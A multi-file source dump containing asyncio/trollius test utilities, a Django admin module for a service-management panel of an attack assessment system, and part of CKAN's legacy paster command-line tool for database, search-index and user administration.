def __init__(self, expected, test_case, callable_obj=None,
expected_regex=None):
_BaseTestCaseContext.__init__(self, test_case)
self.expected = expected
self.test_case = test_case
if callable_obj is not None:
try:
self.obj_name = callable_obj.__name__
except AttributeError:
self.obj_name = str(callable_obj)
else:
self.obj_name = None
if isinstance(expected_regex, (bytes, str)):
expected_regex = re.compile(expected_regex)
self.expected_regex = expected_regex
self.msg = None
def handle(self, name, callable_obj, args, kwargs):
"""
If callable_obj is None, assertRaises/Warns is being used as a
context manager, so check for a 'msg' kwarg and return self.
If callable_obj is not None, call it passing args and kwargs.
"""
if callable_obj is None:
self.msg = kwargs.pop('msg', None)
return self
with self:
callable_obj(*args, **kwargs)
class _AssertRaisesContext(_AssertRaisesBaseContext):
"""A context manager used to implement TestCase.assertRaises* methods."""
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, tb):
if exc_type is None:
try:
exc_name = self.expected.__name__
except AttributeError:
exc_name = str(self.expected)
if self.obj_name:
self._raiseFailure("{0} not raised by {1}".format(exc_name,
self.obj_name))
else:
self._raiseFailure("{0} not raised".format(exc_name))
if not issubclass(exc_type, self.expected):
# let unexpected exceptions pass through
return False
self.exception = exc_value
if self.expected_regex is None:
return True
expected_regex = self.expected_regex
if not expected_regex.search(str(exc_value)):
self._raiseFailure('"{0}" does not match "{1}"'.format(
expected_regex.pattern, str(exc_value)))
return True
def dummy_ssl_context():
if ssl is None:
return None
else:
return SSLContext(ssl.PROTOCOL_SSLv23)
def run_briefly(loop, steps=1):
@coroutine
def once():
pass
for step in range(steps):
gen = once()
t = loop.create_task(gen)
# Don't log a warning if the task is not done after run_until_complete().
# It occurs if the loop is stopped or if a task raises a BaseException.
t._log_destroy_pending = False
try:
loop.run_until_complete(t)
finally:
gen.close()
def run_until(loop, pred, timeout=30):
deadline = time.time() + timeout
while not pred():
if timeout is not None:
timeout = deadline - time.time()
if timeout <= 0:
raise futures.TimeoutError()
loop.run_until_complete(tasks.sleep(0.001, loop=loop))
def run_once(loop):
"""loop.stop() schedules _raise_stop_error()
and run_forever() runs until _raise_stop_error() callback.
this wont work if test waits for some IO events, because
_raise_stop_error() runs before any of io events callbacks.
"""
loop.stop()
loop.run_forever()
class SilentWSGIRequestHandler(WSGIRequestHandler):
def get_stderr(self):
return io.StringIO()
def log_message(self, format, *args):
pass
class SilentWSGIServer(WSGIServer, object):
request_timeout = 2
def get_request(self):
request, client_addr = super(SilentWSGIServer, self).get_request()
request.settimeout(self.request_timeout)
return request, client_addr
def handle_error(self, request, client_address):
pass
class SSLWSGIServerMixin:
def finish_request(self, request, client_address):
# The relative location of our test directory (which
# contains the ssl key and certificate files) differs
# between the stdlib and stand-alone asyncio.
# Prefer our own if we can find it.
here = os.path.join(os.path.dirname(__file__), '..', 'tests')
if not os.path.isdir(here):
here = os.path.join(os.path.dirname(os.__file__),
'test', 'test_asyncio')
keyfile = os.path.join(here, 'ssl_key.pem')
certfile = os.path.join(here, 'ssl_cert.pem')
ssock = wrap_socket(request,
keyfile=keyfile,
certfile=certfile,
server_side=True)
try:
self.RequestHandlerClass(ssock, client_address, self)
ssock.close()
except OSError:
# maybe socket has been closed by peer
pass
class SSLWSGIServer(SSLWSGIServerMixin, SilentWSGIServer):
pass
def _run_test_server(address, use_ssl, server_cls, server_ssl_cls):
def app(environ, start_response):
status = '200 OK'
headers = [('Content-type', 'text/plain')]
start_response(status, headers)
return [b'Test message']
# Run the test WSGI server in a separate thread in order not to
# interfere with event handling in the main thread
server_class = server_ssl_cls if use_ssl else server_cls
httpd = server_class(address, SilentWSGIRequestHandler)
httpd.set_app(app)
httpd.address = httpd.server_address
server_thread = threading.Thread(
target=lambda: httpd.serve_forever(poll_interval=0.05))
server_thread.start()
try:
yield httpd
finally:
httpd.shutdown()
httpd.server_close()
server_thread.join()
if hasattr(socket, 'AF_UNIX'):
class UnixHTTPServer(socketserver.UnixStreamServer, HTTPServer, object):
def server_bind(self):
socketserver.UnixStreamServer.server_bind(self)
self.server_name = '127.0.0.1'
self.server_port = 80
class UnixWSGIServer(UnixHTTPServer, WSGIServer, object):
request_timeout = 2
def server_bind(self):
UnixHTTPServer.server_bind(self)
self.setup_environ()
def get_request(self):
request, client_addr = super(UnixWSGIServer, self).get_request()
request.settimeout(self.request_timeout)
# Code in the stdlib expects that get_request
# will return a socket and a tuple (host, port).
# However, this isn't true for UNIX sockets,
# as the second return value will be a path;
# hence we return some fake data sufficient
# to get the tests going
return request, ('127.0.0.1', '')
class SilentUnixWSGIServer(UnixWSGIServer):
def handle_error(self, request, client_address):
pass
class UnixSSLWSGIServer(SSLWSGIServerMixin, SilentUnixWSGIServer):
pass
def gen_unix_socket_path():
with tempfile.NamedTemporaryFile() as file:
return file.name
@contextlib.contextmanager
def unix_socket_path():
path = gen_unix_socket_path()
try:
yield path
finally:
try:
os.unlink(path)
except OSError:
pass
@contextlib.contextmanager
def run_test_unix_server(use_ssl=False):
with unix_socket_path() as path:
for item in _run_test_server(address=path, use_ssl=use_ssl,
server_cls=SilentUnixWSGIServer,
server_ssl_cls=UnixSSLWSGIServer):
yield item
@contextlib.contextmanager
def run_test_server(host='127.0.0.1', port=0, use_ssl=False):
for item in _run_test_server(address=(host, port), use_ssl=use_ssl,
server_cls=SilentWSGIServer,
server_ssl_cls=SSLWSGIServer):
yield item
def make_test_protocol(base):
dct = {}
for name in dir(base):
if name.startswith('__') and name.endswith('__'):
# skip magic names
continue
dct[name] = MockCallback(return_value=None)
return type('TestProtocol', (base,) + base.__bases__, dct)()
class TestSelector(selectors.BaseSelector):
def __init__(self):
self.keys = {}
def register(self, fileobj, events, data=None):
key = selectors.SelectorKey(fileobj, 0, events, data)
self.keys[fileobj] = key
return key
def unregister(self, fileobj):
return self.keys.pop(fileobj)
def select(self, timeout):
return []
def get_map(self):
return self.keys
class TestLoop(base_events.BaseEventLoop):
"""Loop for unittests.
It manages self time directly.
If something scheduled to be executed later then
on next loop iteration after all ready handlers done
generator passed to __init__ is calling.
Generator should be like this:
def gen():
...
when = yield ...
... = yield time_advance
Value returned by yield is absolute time of next scheduled handler.
Value passed to yield is time advance to move loop's time forward.
"""
def __init__(self, gen=None):
super(TestLoop, self).__init__()
if gen is None:
def gen():
yield
self._check_on_close = False
else:
self._check_on_close = True
self._gen = gen()
next(self._gen)
self._time = 0
self._clock_resolution = 1e-9
self._timers = []
self._selector = TestSelector()
self.readers = {}
self.writers = {}
self.reset_counters()
def time(self):
return self._time
def advance_time(self, advance):
"""Move test time forward."""
if advance:
self._time += advance
def close(self):
super(TestLoop, self).close()
if self._check_on_close:
try:
self._gen.send(0)
except StopIteration:
pass
else: # pragma: no cover
raise AssertionError("Time generator is not finished")
def add_reader(self, fd, callback, *args):
self.readers[fd] = events.Handle(callback, args, self)
def remove_reader(self, fd):
self.remove_reader_count[fd] += 1
if fd in self.readers:
del self.readers[fd]
return True
else:
return False
def assert_reader(self, fd, callback, *args):
assert fd in self.readers, 'fd {0} is not registered'.format(fd)
handle = self.readers[fd]
assert handle._callback == callback, '{0!r} != {1!r}'.format(
handle._callback, callback)
assert handle._args == args, '{0!r} != {1!r}'.format(
handle._args, args)
def add_writer(self, fd, callback, *args):
self.writers[fd] = events.Handle(callback, args, self)
def remove_writer(self, fd):
self.remove_writer_count[fd] += 1
if fd in self.writers:
del self.writers[fd]
return True
else:
return False
def assert_writer(self, fd, callback, *args):
assert fd in self.writers, 'fd {0} is not registered'.format(fd)
handle = self.writers[fd]
assert handle._callback == callback, '{0!r} != {1!r}'.format(
handle._callback, callback)
assert handle._args == args, '{0!r} != {1!r}'.format(
handle._args, args)
def reset_counters(self):
self.remove_reader_count = collections.defaultdict(int)
self.remove_writer_count = collections.defaultdict(int)
def _run_once(self):
super(TestLoop, self)._run_once()
for when in self._timers:
advance = self._gen.send(when)
self.advance_time(advance)
self._timers = []
def call_at(self, when, callback, *args):
self._timers.append(when)
return super(TestLoop, self).call_at(when, callback, *args)
def _process_events(self, event_list):
return
def _write_to_self(self):
pass
def MockCallback(**kwargs):
return mock.Mock(spec=['__call__'], **kwargs)
class MockPattern(str):
"""A regex based str with a fuzzy __eq__.
Use this helper with 'mock.assert_called_with', or anywhere
where a regex comparison between strings is needed.
For instance:
mock_call.assert_called_with(MockPattern('spam.*ham'))
"""
def __eq__(self, other):
return bool(re.search(str(self), other, re.S))
def get_function_source(func):
source = events._get_function_source(func)
if source is None:
raise ValueError("unable to get the source of %r" % (func,))
return source
class TestCase(unittest.TestCase):
def set_event_loop(self, loop, cleanup=True):
assert loop is not None
# ensure that the event loop is passed explicitly in asyncio
events.set_event_loop(None)
if cleanup:
self.addCleanup(loop.close)
def new_test_loop(self, gen=None):
loop = TestLoop(gen)
self.set_event_loop(loop)
return loop
def tearDown(self):
events.set_event_loop(None)
# Detect CPython bug #23353: ensure that yield/yield-from is not used
# in an except block of a generator
if sys.exc_info()[0] == SkipTest:
if compat.PY2:
sys.exc_clear()
else:
self.assertEqual(sys.exc_info(), (None, None, None))
if not hasattr(unittest.TestCase, 'assertRaisesRegex'):
def assertRaisesRegex(self, expected_exception, expected_regex,
callable_obj=None, *args, **kwargs):
"""Asserts that the message in a raised exception matches a regex.
Args:
expected_exception: Exception class expected to be raised.
expected_regex: Regex (re pattern object or string) expected
to be found in error message.
callable_obj: Function to be called.
msg: Optional message used in case of failure. Can only be used
when assertRaisesRegex is used as a context manager.
args: Extra args.
kwargs: Extra kwargs.
"""
context = _AssertRaisesContext(expected_exception, self, callable_obj,
expected_regex)
return context.handle('assertRaisesRegex', callable_obj, args, kwargs)
if not hasattr(unittest.TestCase, 'assertRegex'):
def assertRegex(self, text, expected_regex, msg=None):
"""Fail the test unless the text matches the regular expression."""
if isinstance(expected_regex, (str, bytes)):
assert expected_regex, "expected_regex must not be empty."
expected_regex = re.compile(expected_regex)
if not expected_regex.search(text):
msg = msg or "Regex didn't match"
msg = '%s: %r not found in %r' % (msg, expected_regex.pattern, text)
raise self.failureException(msg)
def check_soure_traceback(self, source_traceback, lineno_delta):
frame = sys._getframe(1)
filename = frame.f_code.co_filename
lineno = frame.f_lineno + lineno_delta
name = frame.f_code.co_name
self.assertIsInstance(source_traceback, list)
self.assertEqual(source_traceback[-1][:3],
(filename,
lineno,
name))
@contextlib.contextmanager
def disable_logger():
"""Context manager to disable asyncio logger.
For example, it can be used to ignore warnings in debug mode.
"""
old_level = logger.level
try:
logger.setLevel(logging.CRITICAL+1)
yield
finally:
logger.setLevel(old_level)
def mock_nonblocking_socket():
"""Create a mock of a non-blocking socket."""
sock = mock.Mock(socket.socket)
sock.gettimeout.return_value = 0.0
return sock
def force_legacy_ssl_support():
return mock.patch('trollius.sslproto._is_sslproto_available',
return_value=False)
|
admin.py
|
import threading
from django.db import transaction
from django.contrib import admin, messages
from Configuration.views import service_start, service_stop
from Configuration.models import Configuration, Services, ServicesLog
# Register your models here.
admin.site.site_header = '阿波罗自动化攻击评估系统' # 设置header
admin.site.site_title = '阿波罗自动化攻击评估系统' # 设置title
@admin.register(Configuration)
class ConfigAdmin(admin.ModelAdmin):
list_display = ['name', 'user', 'value', 'count', 'port', 'ipaddress', 'domain', 'change']
list_filter = ['name', ]
search_fields = ['name', 'user']
ordering = ["id"]
@admin.register(Services)
class ServicesAdmin(admin.ModelAdmin):
list_display = ['id', 'name', 'ip_address', 'port', 'state', 'change']
search_fields = ['name']
ordering = ["id"]
@transaction.atomic
def start(self, request, queryset):
work_ids = None
for item in request.POST.lists():
if item[0] == "_selected_action":
work_ids = item[1]
if isinstance(work_ids, list):
for work_id in work_ids:
thread = threading.Thread(target=service_start, args=(work_id,))
thread.start()
messages.add_message(request, messages.SUCCESS, '启动服务%s' % str(work_id))
else:
messages.add_message(request, messages.SUCCESS, '启动服务异常')
start.short_description = "启动服务"
start.icon = 'fa fa-rocket'
start.style = 'color:white;'
start.type = 'danger'
start.confirm = '您确定要启动服务吗?'
@transaction.atomic
def stop(self, request, queryset):
work_ids = None
for item in request.POST.lists():
if item[0] == "_selected_action":
work_ids = item[1]
if isinstance(work_ids, list):
for work_id in work_ids:
thread = threading.Thread(target=service_stop, args=(work_id,))
thread.start()
messages.add_message(request, messages.SUCCESS, '停止服务%s' % str(work_id))
else:
messages.add_message(request, messages.SUCCESS, '停止服务异常')
stop.short_description = "停止服务"
stop.icon = 'fa fa-rocket'
stop.style = 'color:white;'
stop.type = 'danger'
stop.confirm = '您确定要停止服务吗?'
actions = [start, stop, ]
@admin.register(ServicesLog)
class ServicesLogAdmin(admin.ModelAdmin):
list_display = ['id', 'name', 'ip_address', 'method', 'status', 'message', 'timestamp']
list_filter = ['name', 'method', 'status', ]
search_fields = ['ip_address', 'message']
ordering = ["id"]
def has_add_permission(self, request):
return False
def has_change_permission(self, request, obj=None):
return False
|
cli.py
|
import collections
import csv
import multiprocessing as mp
import os
import datetime
import sys
from pprint import pprint
import re
import ckan.logic as logic
import ckan.model as model
import ckan.include.rjsmin as rjsmin
import ckan.include.rcssmin as rcssmin
import ckan.lib.fanstatic_resources as fanstatic_resources
import ckan.plugins as p
import sqlalchemy as sa
import urlparse
import routes
import paste.script
from paste.registry import Registry
from paste.script.util.logging_config import fileConfig
#NB No CKAN imports are allowed until after the config file is loaded.
# i.e. do the imports in methods, after _load_config is called.
# Otherwise loggers get disabled.
def parse_db_config(config_key='sqlalchemy.url'):
''' Takes a config key for a database connection url and parses it into
a dictionary. Expects a url like:
'postgres://tester:pass@localhost/ckantest3'
'''
from pylons import config
url = config[config_key]
regex = [
'^\s*(?P<db_type>\w*)',
'://',
'(?P<db_user>[^:]*)',
':?',
'(?P<db_pass>[^@]*)',
'@',
'(?P<db_host>[^/:]*)',
':?',
'(?P<db_port>[^/]*)',
'/',
'(?P<db_name>[\w.-]*)'
]
db_details_match = re.match(''.join(regex), url)
if not db_details_match:
raise Exception('Could not extract db details from url: %r' % url)
db_details = db_details_match.groupdict()
return db_details
## from http://code.activestate.com/recipes/577058/ MIT licence.
## Written by Trent Mick
def query_yes_no(question, default="yes"):
"""Ask a yes/no question via raw_input() and return their answer.
"question" is a string that is presented to the user.
"default" is the presumed answer if the user just hits <Enter>.
It must be "yes" (the default), "no" or None (meaning
an answer is required of the user).
The "answer" return value is one of "yes" or "no".
"""
valid = {"yes":"yes", "y":"yes", "ye":"yes",
"no":"no", "n":"no"}
if default == None:
prompt = " [y/n] "
elif default == "yes":
prompt = " [Y/n] "
elif default == "no":
prompt = " [y/N] "
else:
raise ValueError("invalid default answer: '%s'" % default)
while 1:
sys.stdout.write(question + prompt)
choice = raw_input().lower()
if default is not None and choice == '':
return default
elif choice in valid.keys():
return valid[choice]
else:
sys.stdout.write("Please respond with 'yes' or 'no' "\
"(or 'y' or 'n').\n")
class MockTranslator(object):
def gettext(self, value):
return value
def ugettext(self, value):
return value
def ungettext(self, singular, plural, n):
if n > 1:
return plural
return singular
class CkanCommand(paste.script.command.Command):
'''Base class for classes that implement CKAN paster commands to inherit.
'''
parser = paste.script.command.Command.standard_parser(verbose=True)
parser.add_option('-c', '--config', dest='config',
help='Config file to use.')
parser.add_option('-f', '--file',
action='store',
dest='file_path',
help="File to dump results to (if needed)")
default_verbosity = 1
group_name = 'ckan'
def _get_config(self):
from paste.deploy import appconfig
if self.options.config:
self.filename = os.path.abspath(self.options.config)
config_source = '-c parameter'
elif os.environ.get('CKAN_INI'):
self.filename = os.environ.get('CKAN_INI')
config_source = '$CKAN_INI'
else:
self.filename = os.path.join(os.getcwd(), 'development.ini')
config_source = 'default value'
if not os.path.exists(self.filename):
msg = 'Config file not found: %s' % self.filename
msg += '\n(Given by: %s)' % config_source
raise self.BadCommand(msg)
fileConfig(self.filename)
return appconfig('config:' + self.filename)
def _load_config(self, load_site_user=True):
conf = self._get_config()
assert 'ckan' not in dir() # otherwise loggers would be disabled
# We have now loaded the config. Now we can import ckan for the
# first time.
from ckan.config.environment import load_environment
load_environment(conf.global_conf, conf.local_conf)
self.registry=Registry()
self.registry.prepare()
import pylons
self.translator_obj = MockTranslator()
self.registry.register(pylons.translator, self.translator_obj)
if model.user_table.exists() and load_site_user:
# If the DB has already been initialized, create and register
# a pylons context object, and add the site user to it, so the
# auth works as in a normal web request
c = pylons.util.AttribSafeContextObj()
self.registry.register(pylons.c, c)
self.site_user = logic.get_action('get_site_user')({'ignore_auth': True}, {})
pylons.c.user = self.site_user['name']
pylons.c.userobj = model.User.get(self.site_user['name'])
## give routes enough information to run url_for
parsed = urlparse.urlparse(conf.get('ckan.site_url', 'http://0.0.0.0'))
request_config = routes.request_config()
request_config.host = parsed.netloc + parsed.path
request_config.protocol = parsed.scheme
def _setup_app(self):
cmd = paste.script.appinstall.SetupCommand('setup-app')
cmd.run([self.filename])
class ManageDb(CkanCommand):
'''Perform various tasks on the database.
db create - alias of db upgrade
db init - create and put in default data
db clean
db upgrade [version no.] - Data migrate
db version - returns current version of data schema
db dump FILE_PATH - dump to a pg_dump file
db dump-rdf DATASET_NAME FILE_PATH
db simple-dump-csv FILE_PATH - dump just datasets in CSV format
db simple-dump-json FILE_PATH - dump just datasets in JSON format
db user-dump-csv FILE_PATH - dump user information to a CSV file
db send-rdf TALIS_STORE USERNAME PASSWORD
db load FILE_PATH - load a pg_dump from a file
db load-only FILE_PATH - load a pg_dump from a file but don\'t do
the schema upgrade or search indexing
db create-from-model - create database from the model (indexes not made)
db migrate-filestore - migrate all uploaded data from the 2.1 filesore.
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = None
min_args = 1
def command(self):
cmd = self.args[0]
self._load_config(cmd!='upgrade')
import ckan.model as model
import ckan.lib.search as search
if cmd == 'init':
model.repo.init_db()
if self.verbose:
print 'Initialising DB: SUCCESS'
elif cmd == 'clean' or cmd == 'drop':
# remove any *.pyc version files to prevent conflicts
v_path = os.path.join(os.path.dirname(__file__),
'..', 'migration', 'versions', '*.pyc')
import glob
filelist = glob.glob(v_path)
for f in filelist:
os.remove(f)
model.repo.clean_db()
search.clear()
if self.verbose:
print 'Cleaning DB: SUCCESS'
elif cmd == 'upgrade':
if len(self.args) > 1:
model.repo.upgrade_db(self.args[1])
else:
model.repo.upgrade_db()
elif cmd == 'version':
self.version()
elif cmd == 'dump':
self.dump()
elif cmd == 'load':
self.load()
elif cmd == 'load-only':
self.load(only_load=True)
elif cmd == 'simple-dump-csv':
self.simple_dump_csv()
elif cmd == 'simple-dump-json':
self.simple_dump_json()
elif cmd == 'dump-rdf':
self.dump_rdf()
elif cmd == 'user-dump-csv':
self.user_dump_csv()
elif cmd == 'create-from-model':
model.repo.create_db()
if self.verbose:
print 'Creating DB: SUCCESS'
elif cmd == 'send-rdf':
self.send_rdf()
elif cmd == 'migrate-filestore':
self.migrate_filestore()
else:
print 'Command %s not recognized' % cmd
sys.exit(1)
def _get_db_config(self):
return parse_db_config()
def _get_postgres_cmd(self, command):
self.db_details = self._get_db_config()
if self.db_details.get('db_type') not in ('postgres', 'postgresql'):
raise AssertionError('Expected postgres database - not %r' % self.db_details.get('db_type'))
pg_cmd = command
pg_cmd += ' -U %(db_user)s' % self.db_details
if self.db_details.get('db_pass') not in (None, ''):
pg_cmd = 'export PGPASSWORD=%(db_pass)s && ' % self.db_details + pg_cmd
if self.db_details.get('db_host') not in (None, ''):
pg_cmd += ' -h %(db_host)s' % self.db_details
if self.db_details.get('db_port') not in (None, ''):
pg_cmd += ' -p %(db_port)s' % self.db_details
return pg_cmd
def _get_psql_cmd(self):
psql_cmd = self._get_postgres_cmd('psql')
psql_cmd += ' -d %(db_name)s' % self.db_details
return psql_cmd
def _postgres_dump(self, filepath):
pg_dump_cmd = self._get_postgres_cmd('pg_dump')
pg_dump_cmd += ' %(db_name)s' % self.db_details
pg_dump_cmd += ' > %s' % filepath
self._run_cmd(pg_dump_cmd)
print 'Dumped database to: %s' % filepath
def _postgres_load(self, filepath):
import ckan.model as model
assert not model.repo.are_tables_created(), "Tables already found. You need to 'db clean' before a load."
pg_cmd = self._get_psql_cmd() + ' -f %s' % filepath
self._run_cmd(pg_cmd)
print 'Loaded CKAN database: %s' % filepath
def _run_cmd(self, command_line):
import subprocess
retcode = subprocess.call(command_line, shell=True)
if retcode != 0:
raise SystemError('Command exited with errorcode: %i' % retcode)
def dump(self):
if len(self.args) < 2:
print 'Need pg_dump filepath'
return
dump_path = self.args[1]
psql_cmd = self._get_psql_cmd() + ' -f %s'
pg_cmd = self._postgres_dump(dump_path)
def load(self, only_load=False):
if len(self.args) < 2:
print 'Need pg_dump filepath'
return
dump_path = self.args[1]
psql_cmd = self._get_psql_cmd() + ' -f %s'
pg_cmd = self._postgres_load(dump_path)
if not only_load:
print 'Upgrading DB'
import ckan.model as model
model.repo.upgrade_db()
print 'Rebuilding search index'
import ckan.lib.search
ckan.lib.search.rebuild()
else:
print 'Now remember you have to call \'db upgrade\' and then \'search-index rebuild\'.'
print 'Done'
def simple_dump_csv(self):
import ckan.model as model
if len(self.args) < 2:
print 'Need csv file path'
return
dump_filepath = self.args[1]
import ckan.lib.dumper as dumper
dump_file = open(dump_filepath, 'w')
dumper.SimpleDumper().dump(dump_file, format='csv')
def simple_dump_json(self):
import ckan.model as model
if len(self.args) < 2:
print 'Need json file path'
return
dump_filepath = self.args[1]
import ckan.lib.dumper as dumper
dump_file = open(dump_filepath, 'w')
dumper.SimpleDumper().dump(dump_file, format='json')
def dump_rdf(self):
if len(self.args) < 3:
print 'Need dataset name and rdf file path'
return
package_name = self.args[1]
rdf_path = self.args[2]
import ckan.model as model
import ckan.lib.rdf as rdf
pkg = model.Package.by_name(unicode(package_name))
if not pkg:
print 'Dataset name "%s" does not exist' % package_name
return
rdf = rdf.RdfExporter().export_package(pkg)
f = open(rdf_path, 'w')
f.write(rdf)
f.close()
def user_dump_csv(self):
if len(self.args) < 2:
print 'Need csv file path'
return
dump_filepath = self.args[1]
import ckan.lib.dumper as dumper
dump_file = open(dump_filepath, 'w')
dumper.UserDumper().dump(dump_file)
def send_rdf(self):
if len(self.args) < 4:
print 'Need all arguments: {talis-store} {username} {password}'
return
talis_store = self.args[1]
username = self.args[2]
password = self.args[3]
import ckan.lib.talis
talis = ckan.lib.talis.Talis()
return talis.send_rdf(talis_store, username, password)
def migrate_filestore(self):
from ckan.model import Session
import requests
from ckan.lib.uploader import ResourceUpload
results = Session.execute("select id, revision_id, url from resource "
"where resource_type = 'file.upload' "
"and (url_type <> 'upload' or url_type is null)"
"and url like '%storage%'")
for id, revision_id, url in results:
response = requests.get(url, stream=True)
if response.status_code != 200:
print "failed to fetch %s (code %s)" % (url,
response.status_code)
continue
resource_upload = ResourceUpload({'id': id})
assert resource_upload.storage_path, "no storage configured aborting"
directory = resource_upload.get_directory(id)
filepath = resource_upload.get_path(id)
try:
os.makedirs(directory)
except OSError, e:
## errno 17 is file already exists
if e.errno != 17:
raise
with open(filepath, 'wb+') as out:
for chunk in response.iter_content(1024):
if chunk:
out.write(chunk)
Session.execute("update resource set url_type = 'upload'"
"where id = '%s'" % id)
Session.execute("update resource_revision set url_type = 'upload'"
"where id = '%s' and "
"revision_id = '%s'" % (id, revision_id))
Session.commit()
print "Saved url %s" % url
def version(self):
from ckan.model import Session
print Session.execute('select version from migrate_version;').fetchall()
class SearchIndexCommand(CkanCommand):
'''Creates a search index for all datasets
Usage:
search-index [-i] [-o] [-r] [-e] rebuild [dataset_name] - reindex dataset_name if given, if not then rebuild
full search index (all datasets)
search-index rebuild_fast - reindex using multiprocessing using all cores.
This acts in the same way as rubuild -r [EXPERIMENTAL]
search-index check - checks for datasets not indexed
search-index show DATASET_NAME - shows index of a dataset
search-index clear [dataset_name] - clears the search index for the provided dataset or
for the whole ckan instance
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 2
min_args = 0
def __init__(self,name):
super(SearchIndexCommand,self).__init__(name)
self.parser.add_option('-i', '--force', dest='force',
action='store_true', default=False, help='Ignore exceptions when rebuilding the index')
self.parser.add_option('-o', '--only-missing', dest='only_missing',
action='store_true', default=False, help='Index non indexed datasets only')
self.parser.add_option('-r', '--refresh', dest='refresh',
action='store_true', default=False, help='Refresh current index (does not clear the existing one)')
self.parser.add_option('-e', '--commit-each', dest='commit_each',
action='store_true', default=False, help=
'''Perform a commit after indexing each dataset. This ensures that changes are
immediately available on the search, but slows significantly the process.
Default is false.'''
)
def command(self):
if not self.args:
# default to printing help
print self.usage
return
cmd = self.args[0]
# Do not run load_config yet
if cmd == 'rebuild_fast':
self.rebuild_fast()
return
self._load_config()
if cmd == 'rebuild':
self.rebuild()
elif cmd == 'check':
self.check()
elif cmd == 'show':
self.show()
elif cmd == 'clear':
self.clear()
else:
print 'Command %s not recognized' % cmd
def rebuild(self):
from ckan.lib.search import rebuild, commit
# BY default we don't commit after each request to Solr, as it is
# a really heavy operation and slows things a lot
if len(self.args) > 1:
rebuild(self.args[1])
else:
rebuild(only_missing=self.options.only_missing,
force=self.options.force,
refresh=self.options.refresh,
defer_commit=(not self.options.commit_each))
if not self.options.commit_each:
commit()
def check(self):
from ckan.lib.search import check
check()
def show(self):
from ckan.lib.search import show
if not len(self.args) == 2:
print 'Missing parameter: dataset-name'
return
index = show(self.args[1])
pprint(index)
def clear(self):
from ckan.lib.search import clear
package_id =self.args[1] if len(self.args) > 1 else None
clear(package_id)
def rebuild_fast(self):
### Get out config but without starting pylons environment ####
conf = self._get_config()
### Get ids using own engine, otherwise multiprocess will balk
db_url = conf['sqlalchemy.url']
engine = sa.create_engine(db_url)
package_ids = []
result = engine.execute("select id from package where state = 'active';")
for row in result:
package_ids.append(row[0])
def start(ids):
## load actual enviroment for each subprocess, so each have thier own
## sa session
self._load_config()
from ckan.lib.search import rebuild, commit
rebuild(package_ids=ids)
commit()
def chunks(l, n):
""" Yield n successive chunks from l.
"""
newn = int(len(l) / n)
for i in xrange(0, n-1):
yield l[i*newn:i*newn+newn]
yield l[n*newn-newn:]
processes = []
for chunk in chunks(package_ids, mp.cpu_count()):
process = mp.Process(target=start, args=(chunk,))
processes.append(process)
process.daemon = True
process.start()
for process in processes:
process.join()
class Notification(CkanCommand):
'''Send out modification notifications.
In "replay" mode, an update signal is sent for each dataset in the database.
Usage:
notify replay - send out modification signals
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 1
min_args = 0
def command(self):
self._load_config()
from ckan.model import Session, Package, DomainObjectOperation
from ckan.model.modification import DomainObjectModificationExtension
if not self.args:
# default to run
cmd = 'replay'
else:
cmd = self.args[0]
if cmd == 'replay':
dome = DomainObjectModificationExtension()
for package in Session.query(Package):
dome.notify(package, DomainObjectOperation.changed)
else:
print 'Command %s not recognized' % cmd
class RDFExport(CkanCommand):
'''Export active datasets as RDF
This command dumps out all currently active datasets as RDF into the
specified folder.
Usage:
paster rdf-export /path/to/store/output
'''
summary = __doc__.split('\n')[0]
usage = __doc__
def command(self):
self._load_config()
if not self.args:
# default to run
print RDFExport.__doc__
else:
self.export_datasets( self.args[0] )
def export_datasets(self, out_folder):
'''
Export datasets as RDF to an output folder.
'''
import urlparse
import urllib2
import pylons.config as config
import ckan.model as model
import ckan.logic as logic
import ckan.lib.helpers as h
# Create output folder if not exists
if not os.path.isdir( out_folder ):
os.makedirs( out_folder )
fetch_url = config['ckan.site_url']
user = logic.get_action('get_site_user')({'model': model, 'ignore_auth': True}, {})
context = {'model': model, 'session': model.Session, 'user': user['name']}
dataset_names = logic.get_action('package_list')(context, {})
for dataset_name in dataset_names:
dd = logic.get_action('package_show')(context, {'id':dataset_name })
if not dd['state'] == 'active':
continue
url = h.url_for( controller='package',action='read',
id=dd['name'])
url = urlparse.urljoin(fetch_url, url[1:]) + '.rdf'
try:
fname = os.path.join( out_folder, dd['name'] ) + ".rdf"
r = urllib2.urlopen(url).read()
with open(fname, 'wb') as f:
f.write(r)
except IOError, ioe:
sys.stderr.write( str(ioe) + "\n" )
class Sysadmin(CkanCommand):
'''Gives sysadmin rights to a named user
Usage:
sysadmin - lists sysadmins
sysadmin list - lists sysadmins
sysadmin add USERNAME - add a user as a sysadmin
sysadmin remove USERNAME - removes user from sysadmins
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 2
min_args = 0
def command(self):
self._load_config()
import ckan.model as model
cmd = self.args[0] if self.args else None
if cmd == None or cmd == 'list':
self.list()
elif cmd == 'add':
self.add()
elif cmd == 'remove':
self.remove()
else:
print 'Command %s not recognized' % cmd
def list(self):
import ckan.model as model
print 'Sysadmins:'
sysadmins = model.Session.query(model.User).filter_by(sysadmin=True)
print 'count = %i' % sysadmins.count()
for sysadmin in sysadmins:
print '%s name=%s id=%s' % (sysadmin.__class__.__name__,
sysadmin.name,
sysadmin.id)
def add(self):
import ckan.model as model
if len(self.args) < 2:
print 'Need name of the user to be made sysadmin.'
return
username = self.args[1]
user = model.User.by_name(unicode(username))
if not user:
print 'User "%s" not found' % username
makeuser = raw_input('Create new user: %s? [y/n]' % username)
if makeuser == 'y':
password = UserCmd.password_prompt()
print('Creating %s user' % username)
user = model.User(name=unicode(username),
password=password)
else:
print 'Exiting ...'
return
user.sysadmin = True
model.Session.add(user)
model.repo.commit_and_remove()
print 'Added %s as sysadmin' % username
def remove(self):
import ckan.model as model
if len(self.args) < 2:
print 'Need name of the user to be made sysadmin.'
return
username = self.args[1]
user = model.User.by_name(unicode(username))
if not user:
print 'Error: user "%s" not found!' % username
return
user.sysadmin = False
model.repo.commit_and_remove()
class UserCmd(CkanCommand):
'''Manage users
Usage:
user - lists users
user list - lists users
user USERNAME - shows user properties
user add USERNAME [FIELD1=VALUE1 FIELD2=VALUE2 ...]
- add a user (prompts for password
if not supplied).
Field can be: apikey
password
email
user setpass USERNAME - set user password (prompts)
user remove USERNAME - removes user from users
user search QUERY - searches for a user name
'''
summary = __doc__.split('\n')[0]
